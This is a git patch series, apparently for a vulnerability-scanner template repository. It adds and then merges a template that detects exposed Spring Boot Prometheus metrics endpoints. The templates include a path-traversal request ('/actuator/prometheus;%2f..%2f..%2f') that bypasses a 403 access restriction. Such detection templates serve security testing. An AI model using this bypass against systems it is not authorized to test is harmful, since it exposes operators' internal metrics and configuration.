From ee2ce419223d973d61809fd1323f41d4cddde3d2 Mon Sep 17 00:00:00 2001 From: Naveen J Date: Mon, 16 Oct 2023 07:39:05 +0530 Subject: [PATCH 1/2] Create springboot-prometheus.yaml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Bypass 403 restriction to Springboot prometheus endpoint. ### Reference https://infosecwriteups.com/hunting-for-hidden-treasures-unveiling-the-403-bypass-bug-bounty-adventure-️-️-c6d17a0282ac --- .../springboot/springboot-prometheus.yaml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/misconfiguration/springboot/springboot-prometheus.yaml diff --git a/http/misconfiguration/springboot/springboot-prometheus.yaml b/http/misconfiguration/springboot/springboot-prometheus.yaml new file mode 100644 index 0000000000..d6b090d003 --- /dev/null +++ b/http/misconfiguration/springboot/springboot-prometheus.yaml @@ -0,0 +1,39 @@ +id: springboot-Information-Disclosure + +info: + name: Springboot prometheus - Detect + author: thevillagehacker + severity: low + description: Sensitive information disclosure + metadata: + max-request: 4 + tags: misconfig,springboot,prometheus,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/actuator/prometheus;%2f..%2f..%2f" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "# HELP" + - "# TYPE" + - "HELP" + - "TYPE" + condition: or + + - type: word + part: body + words: + - "jvm" + - "tomcat" + condition: or + + - type: status + status: + - 200 From 6f394815add9f620c156aaccfe25f6c35cc957f7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 17 Oct 2023 01:21:17 +0530 Subject: [PATCH 2/2] updated endpoint & co author added the new endpoint in old template and added the author name --- .../prometheus/prometheus-log.yaml | 3 +- .../springboot/springboot-prometheus.yaml | 39 ------------------- 2 files changed, 2 insertions(+), 40 deletions(-) delete mode 100644 http/misconfiguration/springboot/springboot-prometheus.yaml diff --git a/http/misconfiguration/prometheus/prometheus-log.yaml b/http/misconfiguration/prometheus/prometheus-log.yaml index e05afa1a55..6af1c13cc0 100644 --- a/http/misconfiguration/prometheus/prometheus-log.yaml +++ b/http/misconfiguration/prometheus/prometheus-log.yaml @@ -2,7 +2,7 @@ id: prometheus-log info: name: Exposed Prometheus - author: dhiyaneshDK + author: dhiyaneshDK,thevillagehacker severity: low metadata: max-request: 2 @@ -13,6 +13,7 @@ http: path: - "{{BaseURL}}/prometheus" - "{{BaseURL}}/actuator/prometheus" + - "{{BaseURL}}/actuator/prometheus;%2f..%2f..%2f" matchers-condition: and matchers: diff --git a/http/misconfiguration/springboot/springboot-prometheus.yaml b/http/misconfiguration/springboot/springboot-prometheus.yaml deleted file mode 100644 index d6b090d003..0000000000 --- a/http/misconfiguration/springboot/springboot-prometheus.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: springboot-Information-Disclosure - -info: - name: Springboot prometheus - Detect - author: thevillagehacker - severity: low - description: Sensitive information disclosure - metadata: - max-request: 4 - tags: misconfig,springboot,prometheus,exposure - -http: - - method: GET - path: - - "{{BaseURL}}/actuator/prometheus;%2f..%2f..%2f" - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "# HELP" - - "# TYPE" - - "HELP" - - "TYPE" - condition: or - - - type: word - part: body - words: - - "jvm" - - "tomcat" - condition: or - - - type: status - status: - - 200